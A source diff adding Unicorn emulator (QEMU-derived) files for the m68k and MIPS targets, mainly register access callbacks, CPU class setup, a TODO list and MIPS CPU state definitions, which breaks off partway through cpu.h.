/* By Nguyen Anh Quynh , 2015 */

#include "hw/boards.h"
#include "hw/m68k/m68k.h"
#include "sysemu/cpus.h"
#include "unicorn.h"
#include "cpu.h"
#include "unicorn_common.h"
#include "uc_priv.h"


/* Size of the register portion of CPUM68KState that Unicorn snapshots
   (everything up to, but not including, the TLB tables). */
const int M68K_REGS_STORAGE_SIZE = offsetof(CPUM68KState, tlb_table);

/* uc->set_pc callback: point the current vCPU at ADDRESS. */
static void m68k_set_pc(struct uc_struct *uc, uint64_t address)
{
    ((CPUM68KState *)uc->current_cpu->env_ptr)->pc = address;
}

void m68k_release(void* ctx);
/* uc->release callback: free the m68k-specific TCG globals (QREG_* and
   per-register TCGv handles) on top of the common teardown. */
void m68k_release(void* ctx)
{
    TCGContext *tcg_ctx;
    int i;

    release_common(ctx);
    tcg_ctx = (TCGContext *) ctx;
    g_free(tcg_ctx->tb_ctx.tbs);
    g_free(tcg_ctx->QREG_PC);
    g_free(tcg_ctx->QREG_SR);
    g_free(tcg_ctx->QREG_CC_OP);
    g_free(tcg_ctx->QREG_CC_DEST);
    g_free(tcg_ctx->QREG_CC_SRC);
    g_free(tcg_ctx->QREG_CC_X);
    g_free(tcg_ctx->QREG_DIV1);
    g_free(tcg_ctx->QREG_DIV2);
    g_free(tcg_ctx->QREG_MACSR);
    g_free(tcg_ctx->QREG_MAC_MASK);
    for (i = 0; i < 8; i++) {
        g_free(tcg_ctx->cpu_dregs[i]);
        g_free(tcg_ctx->cpu_aregs[i]);
    }
    g_free(tcg_ctx->NULL_QREG);
    g_free(tcg_ctx->store_dummy);
}

/* uc->reg_reset callback: zero the address/data registers and the PC. */
void m68k_reg_reset(struct uc_struct *uc)
{
    CPUArchState *env = uc->cpu->env_ptr;

    memset(env->aregs, 0, sizeof(env->aregs));
    memset(env->dregs, 0, sizeof(env->dregs));

    env->pc = 0;
}

int
/* uc->reg_read callback: copy COUNT registers identified by REGS into the
   caller-supplied 32-bit buffers in VALS.  Handles A0-A7, D0-D7 and PC;
   unknown register ids are silently skipped.  Always returns 0. */
m68k_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count)
{
    CPUState *mycpu = uc->cpu;
    int i;

    for (i = 0; i < count; i++) {
        unsigned int regid = regs[i];
        void *value = vals[i];
        if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7)
            *(int32_t *)value = M68K_CPU(uc, mycpu)->env.aregs[regid - UC_M68K_REG_A0];
        else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7)
            *(int32_t *)value = M68K_CPU(uc, mycpu)->env.dregs[regid - UC_M68K_REG_D0];
        else {
            switch(regid) {
            default: break;
            case UC_M68K_REG_PC:
                *(int32_t *)value = M68K_CPU(uc, mycpu)->env.pc;
                break;
            }
        }
    }

    return 0;
}

/* uc->reg_write callback: mirror of m68k_reg_read.  Writing PC also stops
   emulation so stale translated code is not executed.  Always returns 0. */
int m68k_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count)
{
    CPUState *mycpu = uc->cpu;
    int i;

    for (i = 0; i < count; i++) {
        unsigned int regid = regs[i];
        const void *value = vals[i];
        if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7)
            M68K_CPU(uc, mycpu)->env.aregs[regid - UC_M68K_REG_A0] = *(uint32_t *)value;
        else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7)
            M68K_CPU(uc, mycpu)->env.dregs[regid - UC_M68K_REG_D0] = *(uint32_t *)value;
        else {
            switch(regid) {
            default: break;
            case UC_M68K_REG_PC:
                M68K_CPU(uc, mycpu)->env.pc = *(uint32_t *)value;
                // force to quit execution and flush TB
                uc->quit_request = true;
                uc_emu_stop(uc);
                break;
            }
        }
    }

    return 0;
}

DEFAULT_VISIBILITY
/* Architecture init hook: register CPU/machine types and install all of
   the m68k callbacks on UC, then run the arch-independent init. */
void m68k_uc_init(struct uc_struct* uc)
{
    register_accel_types(uc);
    m68k_cpu_register_types(uc);
    dummy_m68k_machine_init(uc);
    uc->release = m68k_release;
    uc->reg_read = m68k_reg_read;
    uc->reg_write = m68k_reg_write;
    uc->reg_reset = m68k_reg_reset;
    uc->set_pc = m68k_set_pc;
    uc_common_init(uc);
}
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.h
new file mode 100644
index 0000000..5947186
--- /dev/null
+++
b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/unicorn.h @@ -0,0 +1,16 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_M68K_H +#define UC_QEMU_TARGET_M68K_H + +// functions to read & write registers +int m68k_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int m68k_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void m68k_reg_reset(struct uc_struct *uc); + +void m68k_uc_init(struct uc_struct* uc); + +extern const int M68K_REGS_STORAGE_SIZE; +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/Makefile.objs new file mode 100644 index 0000000..e43e509 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/Makefile.objs @@ -0,0 +1,3 @@ +obj-y += translate.o dsp_helper.o op_helper.o lmi_helper.o helper.o cpu.o +obj-y += msa_helper.o +obj-y += unicorn.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/TODO new file mode 100644 index 0000000..1d782d8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/TODO @@ -0,0 +1,51 @@ +Unsolved issues/bugs in the mips/mipsel backend +----------------------------------------------- + +General +------- +- Unimplemented ASEs: + - MDMX + - SmartMIPS + - microMIPS DSP r1 & r2 encodings +- MT ASE only partially implemented and not functional +- Shadow register support only partially implemented, + lacks set switching on interrupt/exception. +- 34K ITC not implemented. +- A general lack of documentation, especially for technical internals. + Existing documentation is x86-centric. 
+- Reverse endianness bit not implemented +- The TLB emulation is very inefficient: + QEMU's softmmu implements a x86-style MMU, with separate entries + for read/write/execute, a TLB index which is just a modulo of the + virtual address, and a set of TLBs for each user/kernel/supervisor + MMU mode. + MIPS has a single entry for read/write/execute and only one MMU mode. + But it is fully associative with randomized entry indices, and uses + up to 256 ASID tags as additional matching criterion (which roughly + equates to 256 MMU modes). It also has a global flag which causes + entries to match regardless of ASID. + To cope with these differences, QEMU currently flushes the TLB at + each ASID change. Using the MMU modes to implement ASIDs hinges on + implementing the global bit efficiently. +- save/restore of the CPU state is not implemented (see machine.c). + +MIPS64 +------ +- Userland emulation (both n32 and n64) not functional. + +"Generic" 4Kc system emulation +------------------------------ +- Doesn't correspond to any real hardware. Should be removed some day, + U-Boot is the last remaining user. + +PICA 61 system emulation +------------------------ +- No framebuffer support yet. + +MALTA system emulation +---------------------- +- We fake firmware support instead of doing the real thing +- Real firmware (YAMON) falls over when trying to init RAM, presumably + due to lacking system controller emulation. 
+- Bonito system controller not implemented +- MSC1 system controller not implemented diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu-qom.h new file mode 100644 index 0000000..89581d4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu-qom.h @@ -0,0 +1,84 @@ +/* + * QEMU MIPS CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_MIPS_CPU_QOM_H +#define QEMU_MIPS_CPU_QOM_H + +#include "qom/cpu.h" + +#ifdef TARGET_MIPS64 +#define TYPE_MIPS_CPU "mips64-cpu" +#else +#define TYPE_MIPS_CPU "mips-cpu" +#endif + +#define MIPS_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, MIPSCPUClass, (klass), TYPE_MIPS_CPU) +#define MIPS_CPU(uc, obj) ((MIPSCPU *)obj) +#define MIPS_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, MIPSCPUClass, (obj), TYPE_MIPS_CPU) + +/** + * MIPSCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * A MIPS CPU model. + */ +typedef struct MIPSCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} MIPSCPUClass; + +/** + * MIPSCPU: + * @env: #CPUMIPSState + * + * A MIPS CPU. 
+ */ +typedef struct MIPSCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUMIPSState env; +} MIPSCPU; + +static inline MIPSCPU *mips_env_get_cpu(CPUMIPSState *env) +{ + return container_of(env, MIPSCPU, env); +} + +#define ENV_GET_CPU(e) CPU(mips_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(MIPSCPU, env) + +void mips_cpu_do_interrupt(CPUState *cpu); +bool mips_cpu_exec_interrupt(CPUState *cpu, int int_req); +hwaddr mips_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); +int mips_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int mips_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); +void mips_cpu_do_unaligned_access(CPUState *cpu, vaddr addr, + int is_write, int is_user, uintptr_t retaddr); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.c new file mode 100644 index 0000000..3b0d422 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.c @@ -0,0 +1,170 @@ +/* + * QEMU MIPS CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see
 *
 */

#include "cpu.h"
#include "qemu-common.h"
#include "hw/mips/mips.h"


/* CPUClass::set_pc: bit 0 of VALUE selects microMIPS/MIPS16 mode
   (MIPS_HFLAG_M16); the remaining bits become the architectural PC. */
static void mips_cpu_set_pc(CPUState *cs, vaddr value)
{
    MIPSCPU *cpu = MIPS_CPU(cs->uc, cs);
    CPUMIPSState *env = &cpu->env;

    env->active_tc.PC = value & ~(target_ulong)1;
    if (value & 1) {
        env->hflags |= MIPS_HFLAG_M16;
    } else {
        env->hflags &= ~(MIPS_HFLAG_M16);
    }
}

/* CPUClass::synchronize_from_tb: resync PC and branch-state hflags from a
   TranslationBlock after a TB lookup. */
static void mips_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb)
{
    MIPSCPU *cpu = MIPS_CPU(cs->uc, cs);
    CPUMIPSState *env = &cpu->env;

    env->active_tc.PC = tb->pc;
    env->hflags &= ~MIPS_HFLAG_BMASK;
    env->hflags |= tb->flags & MIPS_HFLAG_BMASK;
}

/* CPUClass::has_work: decide whether the vCPU has something to run. */
static bool mips_cpu_has_work(CPUState *cs)
{
    MIPSCPU *cpu = MIPS_CPU(cs->uc, cs);
    CPUMIPSState *env = &cpu->env;
    bool has_work = false;

    /* It is implementation dependent if non-enabled interrupts
       wake-up the CPU, however most of the implementations only
       check for interrupts that can be taken. */
    if ((cs->interrupt_request & CPU_INTERRUPT_HARD) &&
        cpu_mips_hw_interrupts_pending(env)) {
        has_work = true;
    }

    /* MIPS-MT has the ability to halt the CPU. */
    if (env->CP0_Config3 & (1 << CP0C3_MT)) {
        /* The QEMU model will issue an _WAKE request whenever the CPUs
           should be woken up. */
        if (cs->interrupt_request & CPU_INTERRUPT_WAKE) {
            has_work = true;
        }

        /* An inactive VPE never has work, regardless of the above. */
        if (!mips_vpe_active(env)) {
            has_work = false;
        }
    }
    return has_work;
}

/* CPUClass::reset() */
static void mips_cpu_reset(CPUState *s)
{
    MIPSCPU *cpu = MIPS_CPU(s->uc, s);
    MIPSCPUClass *mcc = MIPS_CPU_GET_CLASS(s->uc, cpu);
    CPUMIPSState *env = &cpu->env;

    mcc->parent_reset(s);

    /* Zero only up to the mvp member; state past it survives reset. */
    memset(env, 0, offsetof(CPUMIPSState, mvp));
    tlb_flush(s, 1);

    cpu_state_reset(env);
}

/* DeviceClass::realize: reset the CPU, start its vCPU, then chain to the
   parent realize.  Returns 0 (errors reported via ERRP by callees). */
static int mips_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp)
{
    CPUState *cs = CPU(dev);
    MIPSCPUClass *mcc = MIPS_CPU_GET_CLASS(uc, dev);

    cpu_reset(cs);
    qemu_init_vcpu(cs);

    mcc->parent_realize(uc, dev, errp);

    return 0;
}

/* Instance init: wire env_ptr, register with the exec layer, and set up
   the per-context TCG globals when TCG is in use. */
static void mips_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque)
{
    CPUState *cs = CPU(obj);
    MIPSCPU *cpu = MIPS_CPU(uc, obj);
    CPUMIPSState *env = &cpu->env;

    cs->env_ptr = env;
    cpu_exec_init(env, opaque);

    if (tcg_enabled(uc)) {
        mips_tcg_init(uc);
    }
}

/* Class init: save the parent realize/reset handlers, then install all
   MIPS-specific CPUClass callbacks. */
static void mips_cpu_class_init(struct uc_struct *uc, ObjectClass *c, void *data)
{
    MIPSCPUClass *mcc = MIPS_CPU_CLASS(uc, c);
    CPUClass *cc = CPU_CLASS(uc, c);
    DeviceClass *dc = DEVICE_CLASS(uc, c);

    mcc->parent_realize = dc->realize;
    dc->realize = mips_cpu_realizefn;

    mcc->parent_reset = cc->reset;
    cc->reset = mips_cpu_reset;

    cc->has_work = mips_cpu_has_work;
    cc->do_interrupt = mips_cpu_do_interrupt;
    cc->cpu_exec_interrupt = mips_cpu_exec_interrupt;
    cc->set_pc = mips_cpu_set_pc;
    cc->synchronize_from_tb = mips_cpu_synchronize_from_tb;
#ifdef CONFIG_USER_ONLY
    cc->handle_mmu_fault = mips_cpu_handle_mmu_fault;
#else
    cc->do_unassigned_access = mips_cpu_unassigned_access;
    cc->do_unaligned_access = mips_cpu_do_unaligned_access;
    cc->get_phys_page_debug = mips_cpu_get_phys_page_debug;
#endif
}

/* Register the MIPS CPU TypeInfo (positional initializer: class/instance
   sizes, instance init, class init) with the per-uc type registry. */
void mips_cpu_register_types(void *opaque)
{
    const TypeInfo mips_cpu_type_info = {
        TYPE_MIPS_CPU,
        TYPE_CPU,

        sizeof(MIPSCPUClass),
        sizeof(MIPSCPU),
        opaque,

        mips_cpu_initfn,
        NULL,
        NULL,

        NULL,

        mips_cpu_class_init,
        NULL,
        NULL,

        false,
    };

    type_register_static(opaque, &mips_cpu_type_info);
}
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.h
new file mode 100644
index 0000000..df4ec2b
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/cpu.h
@@ -0,0 +1,901 @@
#if !defined (__MIPS_CPU_H__)
#define __MIPS_CPU_H__

//#define DEBUG_OP

#define ALIGNED_ONLY
#define TARGET_HAS_ICE 1

#define ELF_MACHINE EM_MIPS

#define CPUArchState struct CPUMIPSState

#include "config.h"
#include "qemu-common.h"
#include "mips-defs.h"
#include "exec/cpu-defs.h"
#include "fpu/softfloat.h"

struct CPUMIPSState;

/* One R4000-style TLB entry: per-page valid/dirty/inhibit bits for the
   even (0) and odd (1) page of the pair. */
typedef struct r4k_tlb_t r4k_tlb_t;
struct r4k_tlb_t {
    target_ulong VPN;
    uint32_t PageMask;
    uint_fast8_t ASID;
    uint_fast16_t G:1;
    uint_fast16_t C0:3;
    uint_fast16_t C1:3;
    uint_fast16_t V0:1;
    uint_fast16_t V1:1;
    uint_fast16_t D0:1;
    uint_fast16_t D1:1;
    uint_fast16_t XI0:1;
    uint_fast16_t XI1:1;
    uint_fast16_t RI0:1;
    uint_fast16_t RI1:1;
    uint_fast16_t EHINV:1;
    target_ulong PFN[2];
};

#if !defined(CONFIG_USER_ONLY)
/* MMU model: translation callback plus the tlbwi/tlbwr/tlbp/tlbr/tlbinv
   helper hooks, and the backing TLB array. */
typedef struct CPUMIPSTLBContext CPUMIPSTLBContext;
struct CPUMIPSTLBContext {
    uint32_t nb_tlb;
    uint32_t tlb_in_use;
    int (*map_address) (struct CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type);
    void (*helper_tlbwi)(struct CPUMIPSState *env);
    void (*helper_tlbwr)(struct CPUMIPSState *env);
    void (*helper_tlbp)(struct CPUMIPSState *env);
    void (*helper_tlbr)(struct CPUMIPSState *env);
    void (*helper_tlbinv)(struct CPUMIPSState *env);
    void (*helper_tlbinvf)(struct CPUMIPSState *env);
    union {
        struct {
            r4k_tlb_t tlb[MIPS_TLB_MAX];
        } r4k;
    } mmu;
};
#endif

/* MSA Context */
#define MSA_WRLEN (128)

enum
CPUMIPSMSADataFormat { + DF_BYTE = 0, + DF_HALF, + DF_WORD, + DF_DOUBLE +}; + +typedef union wr_t wr_t; +union wr_t { + int8_t b[MSA_WRLEN/8]; + int16_t h[MSA_WRLEN/16]; + int32_t w[MSA_WRLEN/32]; + int64_t d[MSA_WRLEN/64]; +}; + +typedef union fpr_t fpr_t; +union fpr_t { + float64 fd; /* ieee double precision */ + float32 fs[2];/* ieee single precision */ + uint64_t d; /* binary double fixed-point */ + uint32_t w[2]; /* binary single fixed-point */ +/* FPU/MSA register mapping is not tested on big-endian hosts. */ + wr_t wr; /* vector data */ +}; +/* define FP_ENDIAN_IDX to access the same location + * in the fpr_t union regardless of the host endianness + */ +#if defined(HOST_WORDS_BIGENDIAN) +# define FP_ENDIAN_IDX 1 +#else +# define FP_ENDIAN_IDX 0 +#endif + +typedef struct CPUMIPSFPUContext CPUMIPSFPUContext; +struct CPUMIPSFPUContext { + /* Floating point registers */ + fpr_t fpr[32]; + float_status fp_status; + /* fpu implementation/revision register (fir) */ + uint32_t fcr0; +#define FCR0_UFRP 28 +#define FCR0_F64 22 +#define FCR0_L 21 +#define FCR0_W 20 +#define FCR0_3D 19 +#define FCR0_PS 18 +#define FCR0_D 17 +#define FCR0_S 16 +#define FCR0_PRID 8 +#define FCR0_REV 0 + /* fcsr */ + uint32_t fcr31; +#define SET_FP_COND(num,env) do { ((env).fcr31) |= ((num) ? ((int)(1U << (((num) + 24) & 0x1f))) : (1 << 23)); } while(0) +#define CLEAR_FP_COND(num,env) do { ((env).fcr31) &= ~((num) ? 
((int)(1U << (((num) + 24) & 0x1f))) : (1 << 23)); } while(0) +#define GET_FP_COND(env) ((((env).fcr31 >> 24) & 0xfe) | (((env).fcr31 >> 23) & 0x1)) +#define GET_FP_CAUSE(reg) (((reg) >> 12) & 0x3f) +#define GET_FP_ENABLE(reg) (((reg) >> 7) & 0x1f) +#define GET_FP_FLAGS(reg) (((reg) >> 2) & 0x1f) +#define SET_FP_CAUSE(reg,v) do { (reg) = ((reg) & ~(0x3f << 12)) | ((v & 0x3f) << 12); } while(0) +#define SET_FP_ENABLE(reg,v) do { (reg) = ((reg) & ~(0x1f << 7)) | ((v & 0x1f) << 7); } while(0) +#define SET_FP_FLAGS(reg,v) do { (reg) = ((reg) & ~(0x1f << 2)) | ((v & 0x1f) << 2); } while(0) +#define UPDATE_FP_FLAGS(reg,v) do { (reg) |= ((v & 0x1f) << 2); } while(0) +#define FP_INEXACT 1 +#define FP_UNDERFLOW 2 +#define FP_OVERFLOW 4 +#define FP_DIV0 8 +#define FP_INVALID 16 +#define FP_UNIMPLEMENTED 32 +}; + +#define NB_MMU_MODES 3 + +typedef struct CPUMIPSMVPContext CPUMIPSMVPContext; +struct CPUMIPSMVPContext { + int32_t CP0_MVPControl; +#define CP0MVPCo_CPA 3 +#define CP0MVPCo_STLB 2 +#define CP0MVPCo_VPC 1 +#define CP0MVPCo_EVP 0 + int32_t CP0_MVPConf0; +#define CP0MVPC0_M 31 +#define CP0MVPC0_TLBS 29 +#define CP0MVPC0_GS 28 +#define CP0MVPC0_PCP 27 +#define CP0MVPC0_PTLBE 16 +#define CP0MVPC0_TCA 15 +#define CP0MVPC0_PVPE 10 +#define CP0MVPC0_PTC 0 + int32_t CP0_MVPConf1; +#define CP0MVPC1_CIM 31 +#define CP0MVPC1_CIF 30 +#define CP0MVPC1_PCX 20 +#define CP0MVPC1_PCP2 10 +#define CP0MVPC1_PCP1 0 +}; + +typedef struct mips_def_t mips_def_t; + +#define MIPS_SHADOW_SET_MAX 16 +#define MIPS_TC_MAX 5 +#define MIPS_FPU_MAX 1 +#define MIPS_DSP_ACC 4 +#define MIPS_KSCRATCH_NUM 6 + +typedef struct TCState TCState; +struct TCState { + target_ulong gpr[32]; + target_ulong PC; + target_ulong HI[MIPS_DSP_ACC]; + target_ulong LO[MIPS_DSP_ACC]; + target_ulong ACX[MIPS_DSP_ACC]; + target_ulong DSPControl; + int32_t CP0_TCStatus; +#define CP0TCSt_TCU3 31 +#define CP0TCSt_TCU2 30 +#define CP0TCSt_TCU1 29 +#define CP0TCSt_TCU0 28 +#define CP0TCSt_TMX 27 +#define CP0TCSt_RNST 23 
+#define CP0TCSt_TDS 21 +#define CP0TCSt_DT 20 +#define CP0TCSt_DA 15 +#define CP0TCSt_A 13 +#define CP0TCSt_TKSU 11 +#define CP0TCSt_IXMT 10 +#define CP0TCSt_TASID 0 + int32_t CP0_TCBind; +#define CP0TCBd_CurTC 21 +#define CP0TCBd_TBE 17 +#define CP0TCBd_CurVPE 0 + target_ulong CP0_TCHalt; + target_ulong CP0_TCContext; + target_ulong CP0_TCSchedule; + target_ulong CP0_TCScheFBack; + int32_t CP0_Debug_tcstatus; + target_ulong CP0_UserLocal; + + int32_t msacsr; + +#define MSACSR_FS 24 +#define MSACSR_FS_MASK (1 << MSACSR_FS) +#define MSACSR_NX 18 +#define MSACSR_NX_MASK (1 << MSACSR_NX) +#define MSACSR_CEF 2 +#define MSACSR_CEF_MASK (0xffff << MSACSR_CEF) +#define MSACSR_RM 0 +#define MSACSR_RM_MASK (0x3 << MSACSR_RM) +#define MSACSR_MASK (MSACSR_RM_MASK | MSACSR_CEF_MASK | MSACSR_NX_MASK | \ + MSACSR_FS_MASK) + + float_status msa_fp_status; +}; + +typedef struct CPUMIPSState CPUMIPSState; +struct CPUMIPSState { + TCState active_tc; + CPUMIPSFPUContext active_fpu; + + uint32_t current_tc; + uint32_t current_fpu; + + uint32_t SEGBITS; + uint32_t PABITS; + target_ulong SEGMask; + target_ulong PAMask; + + int32_t msair; +#define MSAIR_ProcID 8 +#define MSAIR_Rev 0 + + int32_t CP0_Index; + /* CP0_MVP* are per MVP registers. 
*/ + int32_t CP0_Random; + int32_t CP0_VPEControl; +#define CP0VPECo_YSI 21 +#define CP0VPECo_GSI 20 +#define CP0VPECo_EXCPT 16 +#define CP0VPECo_TE 15 +#define CP0VPECo_TargTC 0 + int32_t CP0_VPEConf0; +#define CP0VPEC0_M 31 +#define CP0VPEC0_XTC 21 +#define CP0VPEC0_TCS 19 +#define CP0VPEC0_SCS 18 +#define CP0VPEC0_DSC 17 +#define CP0VPEC0_ICS 16 +#define CP0VPEC0_MVP 1 +#define CP0VPEC0_VPA 0 + int32_t CP0_VPEConf1; +#define CP0VPEC1_NCX 20 +#define CP0VPEC1_NCP2 10 +#define CP0VPEC1_NCP1 0 + target_ulong CP0_YQMask; + target_ulong CP0_VPESchedule; + target_ulong CP0_VPEScheFBack; + int32_t CP0_VPEOpt; +#define CP0VPEOpt_IWX7 15 +#define CP0VPEOpt_IWX6 14 +#define CP0VPEOpt_IWX5 13 +#define CP0VPEOpt_IWX4 12 +#define CP0VPEOpt_IWX3 11 +#define CP0VPEOpt_IWX2 10 +#define CP0VPEOpt_IWX1 9 +#define CP0VPEOpt_IWX0 8 +#define CP0VPEOpt_DWX7 7 +#define CP0VPEOpt_DWX6 6 +#define CP0VPEOpt_DWX5 5 +#define CP0VPEOpt_DWX4 4 +#define CP0VPEOpt_DWX3 3 +#define CP0VPEOpt_DWX2 2 +#define CP0VPEOpt_DWX1 1 +#define CP0VPEOpt_DWX0 0 + target_ulong CP0_EntryLo0; + target_ulong CP0_EntryLo1; +#if defined(TARGET_MIPS64) +# define CP0EnLo_RI 63 +# define CP0EnLo_XI 62 +#else +# define CP0EnLo_RI 31 +# define CP0EnLo_XI 30 +#endif + target_ulong CP0_Context; + target_ulong CP0_KScratch[MIPS_KSCRATCH_NUM]; + int32_t CP0_PageMask; + int32_t CP0_PageGrain_rw_bitmask; + int32_t CP0_PageGrain; +#define CP0PG_RIE 31 +#define CP0PG_XIE 30 +#define CP0PG_IEC 27 + int32_t CP0_Wired; + int32_t CP0_SRSConf0_rw_bitmask; + int32_t CP0_SRSConf0; +#define CP0SRSC0_M 31 +#define CP0SRSC0_SRS3 20 +#define CP0SRSC0_SRS2 10 +#define CP0SRSC0_SRS1 0 + int32_t CP0_SRSConf1_rw_bitmask; + int32_t CP0_SRSConf1; +#define CP0SRSC1_M 31 +#define CP0SRSC1_SRS6 20 +#define CP0SRSC1_SRS5 10 +#define CP0SRSC1_SRS4 0 + int32_t CP0_SRSConf2_rw_bitmask; + int32_t CP0_SRSConf2; +#define CP0SRSC2_M 31 +#define CP0SRSC2_SRS9 20 +#define CP0SRSC2_SRS8 10 +#define CP0SRSC2_SRS7 0 + int32_t CP0_SRSConf3_rw_bitmask; + 
int32_t CP0_SRSConf3; +#define CP0SRSC3_M 31 +#define CP0SRSC3_SRS12 20 +#define CP0SRSC3_SRS11 10 +#define CP0SRSC3_SRS10 0 + int32_t CP0_SRSConf4_rw_bitmask; + int32_t CP0_SRSConf4; +#define CP0SRSC4_SRS15 20 +#define CP0SRSC4_SRS14 10 +#define CP0SRSC4_SRS13 0 + int32_t CP0_HWREna; + target_ulong CP0_BadVAddr; + uint32_t CP0_BadInstr; + uint32_t CP0_BadInstrP; + int32_t CP0_Count; + target_ulong CP0_EntryHi; +#define CP0EnHi_EHINV 10 + int32_t CP0_Compare; + int32_t CP0_Status; +#define CP0St_CU3 31 +#define CP0St_CU2 30 +#define CP0St_CU1 29 +#define CP0St_CU0 28 +#define CP0St_RP 27 +#define CP0St_FR 26 +#define CP0St_RE 25 +#define CP0St_MX 24 +#define CP0St_PX 23 +#define CP0St_BEV 22 +#define CP0St_TS 21 +#define CP0St_SR 20 +#define CP0St_NMI 19 +#define CP0St_IM 8 +#define CP0St_KX 7 +#define CP0St_SX 6 +#define CP0St_UX 5 +#define CP0St_KSU 3 +#define CP0St_ERL 2 +#define CP0St_EXL 1 +#define CP0St_IE 0 + int32_t CP0_IntCtl; +#define CP0IntCtl_IPTI 29 +#define CP0IntCtl_IPPC1 26 +#define CP0IntCtl_VS 5 + int32_t CP0_SRSCtl; +#define CP0SRSCtl_HSS 26 +#define CP0SRSCtl_EICSS 18 +#define CP0SRSCtl_ESS 12 +#define CP0SRSCtl_PSS 6 +#define CP0SRSCtl_CSS 0 + int32_t CP0_SRSMap; +#define CP0SRSMap_SSV7 28 +#define CP0SRSMap_SSV6 24 +#define CP0SRSMap_SSV5 20 +#define CP0SRSMap_SSV4 16 +#define CP0SRSMap_SSV3 12 +#define CP0SRSMap_SSV2 8 +#define CP0SRSMap_SSV1 4 +#define CP0SRSMap_SSV0 0 + int32_t CP0_Cause; +#define CP0Ca_BD 31 +#define CP0Ca_TI 30 +#define CP0Ca_CE 28 +#define CP0Ca_DC 27 +#define CP0Ca_PCI 26 +#define CP0Ca_IV 23 +#define CP0Ca_WP 22 +#define CP0Ca_IP 8 +#define CP0Ca_IP_mask 0x0000FF00 +#define CP0Ca_EC 2 + target_ulong CP0_EPC; + int32_t CP0_PRid; + int32_t CP0_EBase; + int32_t CP0_Config0; +#define CP0C0_M 31 +#define CP0C0_K23 28 +#define CP0C0_KU 25 +#define CP0C0_MDU 20 +#define CP0C0_MM 17 +#define CP0C0_BM 16 +#define CP0C0_BE 15 +#define CP0C0_AT 13 +#define CP0C0_AR 10 +#define CP0C0_MT 7 +#define CP0C0_VI 3 +#define CP0C0_K0 0 + 
